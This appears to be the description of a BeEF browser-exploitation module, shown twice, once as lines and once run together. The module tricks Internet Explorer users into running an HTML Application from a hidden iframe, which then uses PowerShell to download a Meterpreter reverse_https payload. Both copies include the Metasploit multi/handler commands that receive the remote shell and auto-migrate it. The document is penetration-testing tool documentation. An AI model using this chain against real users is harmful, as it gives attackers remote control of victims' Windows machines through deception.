Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame via BeEF (see social_engineering->hta_powershell module).
The payload is obviously InternetExplorer only (and on Windows targets with powershell installed, so from Windows Vista to more recent versions like 7 and 8). If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.
The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.
Before launching the module, do the following on Metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z
Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame via BeEF (see social_engineering->hta_powershell module).
The payload is obviously InternetExplorer only (and on Windows targets with powershell installed, so from Windows Vista to more recent versions like 7 and 8). If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.
The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.
Before launching the module, do the following on Metasploit: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST x.x.x.x set LPORT 443 set ExitOnSession false set AutoRunScript post/windows/manage/smart_migrate exploit -j -z